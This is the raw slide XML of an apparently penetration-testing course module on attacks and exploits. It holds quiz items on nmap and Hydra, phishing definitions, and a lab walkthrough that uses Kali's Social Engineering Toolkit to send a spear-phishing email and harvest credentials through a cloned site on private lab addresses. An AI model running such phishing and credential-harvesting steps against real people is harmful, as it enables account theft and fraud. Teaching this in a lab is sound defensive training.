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2"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId53"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="675" r:id="rId6"/>
    <p:sldId id="477" r:id="rId7"/>
    <p:sldId id="299" r:id="rId8"/>
    <p:sldId id="305" r:id="rId9"/>
    <p:sldId id="676" r:id="rId10"/>
    <p:sldId id="677" r:id="rId11"/>
    <p:sldId id="679" r:id="rId12"/>
    <p:sldId id="680" r:id="rId13"/>
    <p:sldId id="681" r:id="rId14"/>
    <p:sldId id="691" r:id="rId15"/>
    <p:sldId id="692" r:id="rId16"/>
    <p:sldId id="693" r:id="rId17"/>
    <p:sldId id="694" r:id="rId18"/>
    <p:sldId id="695" r:id="rId19"/>
    <p:sldId id="682" r:id="rId20"/>
    <p:sldId id="690" r:id="rId21"/>
    <p:sldId id="683" r:id="rId22"/>
    <p:sldId id="696" r:id="rId23"/>
    <p:sldId id="684" r:id="rId24"/>
    <p:sldId id="697" r:id="rId25"/>
    <p:sldId id="698" r:id="rId26"/>
    <p:sldId id="706" r:id="rId27"/>
    <p:sldId id="699" r:id="rId28"/>
    <p:sldId id="700" r:id="rId29"/>
    <p:sldId id="717" r:id="rId30"/>
    <p:sldId id="707" r:id="rId31"/>
    <p:sldId id="705" r:id="rId32"/>
    <p:sldId id="701" r:id="rId33"/>
    <p:sldId id="702" r:id="rId34"/>
    <p:sldId id="703" r:id="rId35"/>
    <p:sldId id="704" r:id="rId36"/>
    <p:sldId id="687" r:id="rId37"/>
    <p:sldId id="709" r:id="rId38"/>
    <p:sldId id="710" r:id="rId39"/>
    <p:sldId id="711" r:id="rId40"/>
    <p:sldId id="688" r:id="rId41"/>
    <p:sldId id="708" r:id="rId42"/>
    <p:sldId id="689" r:id="rId43"/>
    <p:sldId id="712" r:id="rId44"/>
    <p:sldId id="713" r:id="rId45"/>
    <p:sldId id="714" r:id="rId46"/>
    <p:sldId id="715" r:id="rId47"/>
    <p:sldId id="716" r:id="rId48"/>
    <p:sldId id="685" r:id="rId49"/>
    <p:sldId id="686" r:id="rId50"/>
    <p:sldId id="678"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p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns=""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xmlns=""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6/12/2018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xmlns=""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xmlns=""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A0299C-E15C-48E4-817E-93A47249E6BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{718DF830-84EC-4541-9CE5-2E15E750B275}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/12/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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5: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacks and Exploits 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06/12/2018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xmlns=""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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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A False Positive is when a test fails to indicate a condition or attribute is present when it is, such as a port being open but not shown as open. True or False?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>False</a:t>
            </a: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A False Positive is when a test fails to indicate a condition or attribute is present when it is, such as a port being open but not shown as open. True or False?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>False</a:t>
            </a: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What does the -A command line option in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> do?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Version Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Script Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Traceroute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>None of the Above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All of the Above</a:t>
            </a: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What does the -A command line option in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> do?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Version Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Script Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Traceroute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>None of the Above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>All of the Above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Note: Older versions only performed OS and Version Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRP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true about Hydra?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra is a brute force password cracker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra can attack over 40 services such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ftp, http, databases, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra uses Rainbow tables to speed up password cracking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra is a fictional terrorist organization that appears in the Marvel universe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra supports 2 different types of input files for usernames/passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is a trick question, All of the Above are true!</a:t>
            </a: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of the following is NOT true about Hydra?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra is a brute force password cracker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra can attack over 40 services such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ftp, http, databases, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra uses Rainbow tables to speed up password cracking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra is a fictional terrorist organization that appears in the Marvel universe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra supports 2 different types of input files for usernames/passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is a trick question, All of the Above are true!</a:t>
            </a:r>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Attacks and Exploits – Domain 3.1</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158750" y="2757020"/>
            <a:ext cx="8824913" cy="18669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Phishing - a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking, and credit card details, and passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spear phishing - When attackers try to craft a message to appeal to a specific individual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SMS (short message service) phishing – Phishing via text message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Voice phishing - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: The telephone equivalent of phishing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Whaling - Whale phishing, or whaling, is a form of spear phishing aimed at the very big fish — CEOs or other high-value targets.</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Spear phishing with Kali and SET</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18</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To conduct this demo you must be running the Net-Server, Dev-Client, and Kali Linux provided virtual machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You may simply minimize the Net-Server VM, it just has to be running.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You will use the Kali Linux VM to conduct the attack in two phases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You will use The Social Engineering Toolkit (SET) to send a spear phishing email to victim@test.test using the Mass Mailer Attack choice under the Social Engineering Attacks menu.  You will chose to attack a single email address – victim@test.test.  You will choose to use your own or open relay as we will be using the Net-Server for this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When it asks for the email server, use 192.168.13.250, its IP address, NOT its name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the email body use something like the following to send the victim to you:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“http://192.168.13.13”&gt;www.test.test&lt;/a&gt;</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754940" y="1396987"/>
              <a:ext cx="927100" cy="8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bwMode="auto">
            <a:xfrm>
              <a:off x="766690" y="3518974"/>
              <a:ext cx="852034" cy="790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754940" y="2498532"/>
              <a:ext cx="909638" cy="843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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the second phrase, you will use SET to clone the www.test.test site and set up a credential harvester.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Under Social Engineering Attacks,  choose Credential Harvester Attack Method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Choose to clone a site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>192.168.13.13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as the POST back address and then enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>http://192.168.13.250 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as the site to clone using its IP address, not name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SET will then work with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Framework to set up a site and listener.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sadly we have to fix one thing, a wrong IP address in the cloned site…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open a second Workspace and a new Terminal window on this workspace (we want to leave the first one attached to the listener).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Edit index.html file in .set/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>web_clone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> folder, replacing 192.168.13.250 with 192.168.13.13 using: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> .set/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>web_clone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/index.html  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ctrl+O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to save, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ctrl+X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to exit.</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20</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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then set up the Dev-Client virtual machine to get email using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Info is as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>victim@test.test is email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>victim is both the username and password for the account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mail.test.test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or 192.168.13.250 can be used as incoming and outgoing email server names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure to NOT use encryption and to use Clear text as authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then check your email.  Should receive test message, then spear phish message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ignore the security warnings (as most users do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) and click on the link in the email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Login with victim/victim, will be redirected to real/main site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Back in Kali windows you have a hit, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ctrl+C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to exit and run report in .set</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Elicitation - The practice of collecting the requirements of a system from users, customers and other stakeholders.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Business email compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interrogation - Interviewing as commonly employed by law enforcement officers, military personnel, and intelligence agencies with the goal of eliciting useful information.  Hackers have to be creative here…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Impersonation - The act of pretending to be another person for the purpose of fraud.  A favorite tactic is pretending to be IT or such support staff.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shoulder surfing - applies to computers, but also Door locks, ATMs, POS (Point of Sale), etc.</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USB key drop</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="285750" y="1802474"/>
            <a:ext cx="8572500" cy="26670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Motivation techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scarcity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social proof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Urgency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Likeness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fear</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marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consensus: we crave social group interaction and have a need to be included, even when we don't fully understand what the inclusion means for us or why we are performing the action. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A perfect example is this Social Conformity Experiment  video. https://www.youtube.com/watch?v=MEhSk71gUCQ</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VIDEO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Social Conformity Experiment</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26</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Do you think you would have stood up and sat down on the beeps?</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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2. Familiarity: we all have our "soft spots" or "weaknesses". That's why information gathering is crucial for social engineers. Once they discover that soft spot, they are more likely to succeed in getting a person to do what they want. An example: A CEO was duped when it was found out he had a family member battling cancer through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Using this info they asked him to donate to cancer research. Sadly, the donation PDF contained malware…</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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3. Trust: the irony of why social engineers are so successful is two-fold: First, they successfully gain our trust, and secondly, we perhaps trust ourselves a little too much. Social engineers don't have to be geniuses to learn about people. Ever heard the saying "one person's trash is another person's treasure"? It is amazing what can be learned from a simple dive into someone's physical trash can, much less their online profiles. </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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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xmlns=""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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns=""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a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
